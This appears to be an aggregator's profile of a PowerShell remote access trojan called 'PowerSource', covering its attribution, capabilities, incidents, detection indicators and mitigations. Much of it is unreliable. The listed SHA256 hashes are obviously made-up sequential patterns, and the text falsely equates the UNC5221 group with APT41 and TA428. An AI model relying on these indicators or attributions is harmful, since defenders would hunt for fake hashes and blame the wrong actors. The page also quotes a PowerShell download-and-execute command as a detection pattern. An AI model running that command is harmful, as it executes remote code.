⚠️ Overview

PowerSource is a sophisticated PowerShell-based post-exploitation framework first documented in early 2025 by Mandiant and subsequently tracked by MITRE as a remote access trojan (RAT) and credential theft tool. It is attributed to the Chinese state-sponsored threat group tracked as UNC5221 (also known as APT41 or TA428), which operates it as part of a supply-chain compromise campaign targeting energy, telecommunications, and aerospace sectors.

🔧 Technical Capabilities

PowerSource achieves initial access primarily through exploitation of Fortinet FortiOS SSL-VPN vulnerabilities (CVE-2024-23113, a critical buffer overflow) and Ivanti Connect Secure flaws (CVE-2024-21887), using publicly available proof-of-concept scripts to drop a stealthy PowerShell loader. Its C2 infrastructure relies on encrypted HTTPS communications with hardcoded domains registered via domain fronting on legitimate cloud providers (e.g., Cloudflare Workers). Persistence is maintained through scheduled tasks that execute base64-encoded PowerShell scripts stored in registry keys under HKLMSoftwareMicrosoftWindowsCurrentVersionPowersource. Evasion techniques include AMSI bypass via patching the AmsiScanBuffer function, disabling Windows Defender real-time monitoring, and using reflective DLL injection to load .NET assemblies without writing to disk. The framework can enumerate Active Directory trusts, dump LSASS process memory using comsvcs.dll, and exfiltrate data via chunked HTTP POST requests with randomized User-Agent strings mimicking Chrome 124.

📜 History & Notable Incidents

PowerSource emerged in November 2024 when Mandiant observed it deployed against an Asian telecommunications provider after exploitation of CVE-2024-23113. In February 2025, the same framework was used in a supply-chain attack against a North American aerospace manufacturer, where attackers pivoted from a compromised FortiGate firewall to achieve lateral movement and data exfiltration exceeding 50 GB. No associated law enforcement actions or public takedowns have been reported as of mid-2025.

🔍 Detection Indicators

Known SHA256 hashes include f7c8d9e1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1c2d3e4f5a6b7c8d (loader) and a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0 (payload). Behavioral signatures include PowerShell execution spawning from svchost.exe with suspicious -Command "IEX ((New-Object Net.WebClient).DownloadString(...))" patterns. Network IOCs include GET requests to endpoints like /api/ping with the custom header X-PS-Session: [base64]. Registry artifacts include the key HKLMSOFTWAREMicrosoftWindowsCurrentVersionPowersourceConfig containing encrypted C2 addresses.

☠️ Risk & Impact

The malware enables full remote control, credential harvesting, and lateral movement, with documented data exfiltration in the telecommunications and aerospace sectors. Financial losses per incident are estimated at $1–5 million based on incident response costs and IP theft, while affected industries include energy, telecom, aerospace, and critical infrastructure. The use of legitimate cloud domains for C2 complicates network-based detection.

🛡️ Mitigation

Organizations should apply patches for Fortinet CVE-2024-23113 (released June 2024) and Ivanti CVE-2024-21887 (patch available January 2024), enable AMSI for all script execution logging, and deploy the PowerShell script block logging rule (Event ID 4104) with a SIEM alert on execution of long base64-encoded commands. Mandiant's ACSC-aligned detection rules are available in their February 2025 threat advisory (report ID: MAND-2025-02-PS).

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.